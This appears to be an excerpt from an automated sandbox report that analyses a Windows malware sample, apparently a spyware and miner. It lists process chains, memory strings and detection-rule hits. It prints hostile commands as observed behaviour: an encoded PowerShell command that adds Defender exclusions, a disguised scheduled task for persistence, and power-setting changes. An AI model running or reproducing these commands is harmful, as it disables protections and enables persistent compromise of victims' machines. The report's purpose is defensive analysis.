                  Source: powershell.exe, 0000001A.00000002.2304314220.0000000005075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 0000001A.00000002.2304314220.0000000004F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                  Source: inject.exe, 00000000.00000002.2055709662.00000000037F5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2215892910.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                  Source: RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: powershell.exe, 0000001A.00000002.2313653824.0000000005F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000001A.00000002.2313653824.0000000005F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000001A.00000002.2313653824.0000000005F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 0000001A.00000002.2304314220.0000000005075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: Installer.exe, 00000016.00000002.2283720664.0000000000E58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: powershell.exe, 0000001A.00000002.2313653824.0000000005F87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2339213093.00000000033FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.000000000344C000.00000004.00000800.00020000.00000000.sdmp, logs.uce.23.dr, logs.uce1.23.dr, logs.uce0.23.drString found in binary or memory: https://pastebin.com/raw/dq3hWX27
                  Source: Installer.exe.20.dr, conhost.exe.3.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003427000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2339213093.0000000003423000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                  Source: RegSvcs.exe, 00000017.00000002.2339213093.0000000003427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                  Source: RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.5:49716 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,000000005_2_00408DBB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\TmpCC71.tmpJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\TmpCC60.tmpJump to dropped file

                  System Summary

                  barindex
                  Source: 00000016.00000002.2282337473.000000000045A000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: Process Memory Space: Installer.exe PID: 2164, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: inject.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 311296
                  Source: file.bin.5.drZip Entry: encrypted
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_003196AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,9_2_003196AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0155DC743_2_0155DC74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06A3A6B83_2_06A3A6B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06A367D83_2_06A367D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06A33F503_2_06A33F50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06A3A6883_2_06A3A688
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06A36FE83_2_06A36FE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06A36FF83_2_06A36FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFB6003_2_06CFB600
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFBC403_2_06CFBC40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CF92D73_2_06CF92D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFA2803_2_06CFA280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CF7AA83_2_06CF7AA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFE2703_2_06CFE270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CF13C03_2_06CF13C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFC3A83_2_06CFC3A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFEB603_2_06CFEB60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFD3703_2_06CFD370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFF8D03_2_06CFF8D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CF71D83_2_06CF71D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFD9803_2_06CFD980
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFB1983_2_06CFB198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CF6E903_2_06CF6E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFB5F03_2_06CFB5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CF13B03_2_06CF13B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CFF8C13_2_06CFF8C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7ECA03_2_08E7ECA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7CD103_2_08E7CD10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7A1983_2_08E7A198
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7B5803_2_08E7B580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E703B83_2_08E703B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E77EA03_2_08E77EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E77E903_2_08E77E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E713FC3_2_08E713FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E797C83_2_08E797C8
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_00405BFC5_2_00405BFC
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_0040B0E05_2_0040B0E0
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_0040B0E45_2_0040B0E4
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_004199735_2_00419973
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_0040A9005_2_0040A900
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_0040A2705_2_0040A270
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_0040AC205_2_0040AC20
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_00409C205_2_00409C20
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_0040D4805_2_0040D480
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_0040ED005_2_0040ED00
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_00409DD05_2_00409DD0
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_004196015_2_00419601
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_004196DB5_2_004196DB
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_00418F405_2_00418F40
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0033F13E9_2_0033F13E
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_003354589_2_00335458
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_003324C09_2_003324C0
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_003347AC9_2_003347AC
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_003588179_2_00358817
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_00320DCC9_2_00320DCC
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0031B1149_2_0031B114
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0031F1B49_2_0031F1B4
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0032C2789_2_0032C278
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_003535289_2_00353528
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_003425789_2_00342578
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0034066E9_2_0034066E
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0033D66C9_2_0033D66C
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0032D8589_2_0032D858
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0033694C9_2_0033694C
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_003499B89_2_003499B8
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_003549A59_2_003549A5
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_003479DC9_2_003479DC
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0035DA309_2_0035DA30
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0034FA0C9_2_0034FA0C
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0035DC119_2_0035DC11
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_00327C689_2_00327C68
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_00328CA89_2_00328CA8
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0035DD009_2_0035DD00
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_00336E089_2_00336E08
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_00318F189_2_00318F18
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0032AF589_2_0032AF58
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030128022_2_00301280
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030542422_2_00305424
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030DA2022_2_0030DA20
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0031122C22_2_0031122C
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0030DEB822_2_0030DEB8
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0031272D22_2_0031272D
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_0031134C22_2_0031134C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_030CF2E423_2_030CF2E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032FB33823_2_032FB338
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032FA04023_2_032FA040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032F670023_2_032F6700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032F977023_2_032F9770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032FDA8823_2_032FDA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032FC87823_2_032FC878
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032FB32723_2_032FB327
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032FC65523_2_032FC655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032F66F023_2_032F66F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032F050823_2_032F0508
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032F051823_2_032F0518
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032F942823_2_032F9428
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 23_2_032FDA7823_2_032FDA78
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_0491B57026_2_0491B570
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_0491B55026_2_0491B550
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_08903EB026_2_08903EB0
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\main\7z.dll 34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\main\7z.exe 344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: String function: 00302330 appears 36 times
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: String function: 004029A6 appears 44 times
                  Source: inject.exe, 00000000.00000002.2055709662.0000000003838000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKneepad.exe8 vs inject.exe
                  Source: inject.exe, 00000000.00000002.2054450049.00000000009CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs inject.exe
                  Source: inject.exeBinary or memory string: OriginalFilenameVQP.exe@ vs inject.exe
                  Source: inject.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000016.00000002.2282337473.000000000045A000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: Process Memory Space: Installer.exe PID: 2164, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                  Source: inject.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.inject.exe.37f5570.0.raw.unpack, Arguments.csBase64 encoded string: 'HEsbFS1dHgYifwEVBkY6CgU0dR45PRwfCSIxfRgkMBMMJSsFF0opDRY8WQYhFTMaB0cmCjhBdBI5MRsIIDU2fTQEWEk='
                  Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@56/47@3/4
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,5_2_00409606
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0031AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,9_2_0031AC74
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_00321D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,9_2_00321D04
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_0040122A GetDiskFreeSpaceExW,SendMessageW,5_2_0040122A
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,5_2_004092C1
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,5_2_004020BF
                  Source: C:\Users\user\Desktop\inject.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\inject.exe.logJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\ProgramV3
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\TmpCC60.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                  Source: inject.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: inject.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: inject.exeReversingLabs: Detection: 76%
                  Source: unknownProcess created: C:\Users\user\Desktop\inject.exe "C:\Users\user\Desktop\inject.exe"
                  Source: C:\Users\user\Desktop\inject.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\inject.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\conhost.exe "C:\Users\user\AppData\Local\Temp\conhost.exe"
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe"
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
